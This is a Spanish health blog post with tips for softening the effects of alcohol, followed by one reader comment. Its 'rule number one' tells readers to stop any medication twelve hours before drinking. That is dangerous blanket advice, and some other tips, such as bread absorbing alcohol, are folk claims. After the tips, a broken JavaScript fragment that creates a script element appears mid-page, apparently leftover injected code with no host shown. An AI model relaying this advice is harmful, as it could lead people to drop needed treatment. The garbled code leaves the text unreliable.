Salud y belleza » Alimentación

¿Reducir los efectos del alcohol?

1 Comentario

A menudo la medicina, o al menos los profesionales que se mueven en esa ciencia, deben soportar ciertos debates morales y tomar decisiones. De hecho, constantemente sucede eso. Por ejemplo, en cualquier consulta, la respuesta de un profesional de la salud siempre se mueve entre lo “real” y el “ideal”: si un hombre es obeso, se le recomendará una dieta especifica pero, naturalmente, con ciertos permisos; si un deportista profesional posee una lesión pero debe jugar, puede que el médico le recomienda de que manera debe vendarse (aún si lo ideal fue continuar el reposo).

Bien, el siguiente artículo también anda por ese “limbo”: entre el cielo, lo ideal, y la tierra, lo real. El informe se compone de una serie de recomendaciones y trucos para conseguir que el alcohol no logre dejarnos secuelas tan poderosas. Aunque naturalmente, es verdad que lo mejor sería controlar su consumo al punto de no llegar a padecer esos síntomas. Eterno debate entre real e ideal. Aquí, lo real.

  • Comer bien, antes de comenzar a beber. Efectivamente, cuando se tiene el estómago lleno el efecto del alcohol merma pues, lógicamente, el estomago se encuentra repleto de otros elementos. Lo ideal es cenar pastas y, de hecho, comer mucho pan (funciona para absorber líquidos).
  • No mezclar. Es fundamental evitar las mezclas, es decir, si lo nuestro es la cerveza, debemos continuar bebiendo cerveza y no pasar a, digamos, las bebidas blancas. De esta manera, amén de los límites obvios y recomendados, nuestro cuerpo no se verá tan afectado.
  • Evitar medicamentos. Regla número uno: cortar cualquier medicina si se va a consumir alcohol. Sucede que, mientras algunos remedios mezclados con alcohol solo provocan con la neutralización de esos efectos, otras sustancias pueden volverse peligrosas e, incluso, poner en jaque la vida de un sujeto (especialmente si éste sufre problemas cardíacos). Por eso, antes de beber, dejar un espacio de doce horas con respecto a los medicamentos.
  • Descartar los energizantes. Mezclar vodka o whisky con un energizante es una verdadera ruleta rusa para el organismo. Es preferible beber cualquiera de esos tragos sin agregados, aunque sean  fuertes, que mezclarlos con los energizantes. Los efectos de estas bebidas en lata tan de moda en la actualidad, incrementan el ritmo y el pulso provocando, lógicamente, un terrible desorden en el sistema nervioso. Nunca debemos incorporarlos a nuestra bebidas: ni al champagne, ni a ninguna por mas inofensivo que parezca.

var d=document;var s=d.createElement('script'); } else {

Más consejos de salud y belleza : , , ,

One Comment »

  • salud y belleza said:

    en mi opinión sincera, yo creo que por salud y belleza se puede prescindir totalmente del consumo de alcohol; claro, hay personas que beben con moderación y además no acostumbran

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.